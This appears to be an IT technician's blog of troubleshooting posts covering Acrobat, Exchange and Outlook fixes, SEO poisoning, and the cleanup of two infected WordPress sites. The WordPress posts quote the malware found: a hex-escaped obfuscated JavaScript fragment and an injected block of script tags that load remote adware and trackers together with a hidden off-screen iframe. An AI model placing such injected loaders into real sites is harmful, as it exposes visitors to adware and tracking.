Wednesday, November 20, 2019

Acrobat won’t open “Attempt to access invalid address”

We had a user that suddenly couldn’t open any local or networked PDF files. I uninstalled, ran CCleaner, Adobe’s after acrobat cleaner, restarted the machine, and finally re-installed Acrobat. Same error came up.

This issue was solved by uninstalling EMET 5.1. Not really what I wanted to do but the user had to get work done.

Going to follow up with Adobe for a better solution.

The following link pointed me in the EMET direction.

https://forums.adobe.com/message/6830531

Hope this helps someone else out there….

iPhone not syncing with Exchange

We have had several calls about someone getting a new iPhone 6 and now they are no longer receiving the company emails which are handled with an Exchange server. We set up the connection, and get all check marks but still won’t sync. Here is what we have found to solve it.

  1. In Active Directory click on “View” and check “Users, Contacts, Groups, and Computers as containers.”
  2. Next the user with the issue is now a plus sign.
  3. Expand the plus sign and select “ExchangeActiveSyncDevices”.
  4. Remove any entries and the person should now be able to connect.

Outlook “Sorry we are having trouble opening this item. This could be temporary..”

Had a couple of users that were getting this error:

“Sorry, we’re having trouble opening this item. This could be temporary, but if you see it again you might want to restart Outlook”

They use an Exchange server. This was solved by rebuilding the Outlook profile. Here were the steps.

  1. Go into the control panel >> mail >> show profiles.
  2. Add a new profile, and click next. It should find the users credentials from the exchange server
  3. Check “Prompt for a profile to be used.”
  4. Restart Outlook and select the new profile.
  5. Then go back to the control panel >> Mail >> Show Profile and select “Always use this profile. Use the dropdown and select the new profile. Hit apply.
  6. You may need to restart outlook a few times for everything to work properly. At the bottom of Outlook will see outlook adding the emails back into this new profile.
  7. When everything is working you can delete the old profile.

What is SEO poisoning?

I found the following article that introduced me to the term “SEO poisoning.”

http://www.scmagazine.com/attackers-use-seo-spam-to-improve-the-rankings-of-their-websites-on-google-and-other-search-engines/article/375339/

I was considering this Cross-Site Scripting, but the code wasn’t malicious is was just leading back to another site selling their services. The term SEO poisoning makes more sense. The goal of this poisoning is to increase the rankings of the company performing the action by embedding links into a legitimate site and linking back to their site. Link backs are part of the matrix Google uses to rank your site.

The links are often displayed off screen so webmasters are usually unaware of the poisoning even happening. Fortunately some of the writers of the plugins are aware of this technique are incorporating tools into their plugins.

WordPress site blocked by SonicWall – JS.Agent.NKW_2 (Trojan)

Had a customer’s website blocked by our internal firewall.

dr_blum_homepage_blocked_infection_small

They were running WP Antivirus Site Protection plug-in. It listed the following files.

  • /wp-content/plugins/nextgen-gallery/nggallery.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ngglegacy/lib/imagemagick.inc.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/class.router.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/class.routing_app.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/router/interface.routing_app.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/wordpress_routing/adapter.wordpress_routing_app.php
    /wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ngglegacy/admin/functions.php
    /wp-content/plugins/si-contact-form/includes/class-fscf-process.php

 

This link provided me with some detail. There was a code that looked like “\x73\x63\x5F\x63\x6F”,\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64″,\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68″,\x77\x69\x64\x74\x68″,\x68\x65\x69\x67\x68\x74″,\x63\x68\x61\x72\x73\x65\x74″,\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,\x72\x65\x66\x65\x72\x72\x65\x72″,

Deleting this out is supposed to help.

https://wordpress.org/support/topic/jsagent-warnings-in-avg-nightmare-hack-in-multiple-wordpress-sites

Here is a good article on this issue.

http://blog.sucuri.net/2012/12/website-malware-sharp-increase-in-spam-attacks-wordpress-joomla.html

 

 

WordPress site infected with CouponDropDown Adware

Customers WordPress site got hacked. They use Network Solutions as their host. Network Solutions took their site offline. We had to delete all the WordPress files, upload a clean version, and put their content and theme back. After that the site was back up and running.

I reviewed the site to make sure the permalinks didn’t cause a problem. On one page there were banners ads showing up.

lawyer_website_xxs

The issue turned out to be a form Cross Site Scripting or SEO poisoning. There was a database entry that had the extra text in it. Here is the text below.

————————————————————————————————–

<div id=”__tbSetup”></div>

<script type=”text/javascript” src=”http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862″></script><script type=”text/javascript” src=”https://loading-resource.com/data.js.php?i={6C425871-ABD5-4124-A2B2-C02CE1D37F67}&amp;d=2013-1-17&amp;s=http://mcmanus-darden.com/home/wp-admin/post.php?post=361&amp;action=edit”></script><script id=”__changoScript” type=”text/javascript”>// <![CDATA[

var __chd__ = {‘aid’:11079,’chaid’:’www_objectify_ca’};(function() { var c = document.createElement(‘script’); c.type = ‘text/javascript’; c.async = true;c.src = ( ‘https:’ == document.location.protocol ? ‘https://z’: ‘http://p’) + ‘.chango.com/static/c.js’; var s = document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(c, s);})();

// ]]></script><script id=”__simpliScript” type=”text/javascript” src=”http://i.simpli.fi/dpx.js?cid=3065&amp;m=1″ data-sifi-parsed=”true”></script><script type=”text/javascript” src=”http://www.superfish.com/ws/sf_main.jsp?dlsource=wjfudcm&amp;userId=ezZDNDI1ODcxLUFCRDUtND&amp;CTID=default-US”></script><script type=”text/javascript” src=”http://www.vitruvianleads.com/build/production/selectionlinks/templates/bootstrap.js”></script><script type=”text/javascript” src=”http://i.simpli.fi/p?cid=3065&amp;cb=dpx_48652254532._hp”></script><iframe id=”l3adg3n-xdm” style=”position: absolute; top: -1000px; left: -1000px; width: 1px; height: 1px;” src=”http://www.vitruvianleads.com/build/xdm.html” width=”320″ height=”240″></iframe>

————————————————————————————————–

There were multiple entries under this title. I used the source to figure out the actual page is was effecting. It was entry 361. There were approximately 20 revisions, but it was the original 361 that took the script off the site. It was in some revisions but not all.

I hope this helps someone else….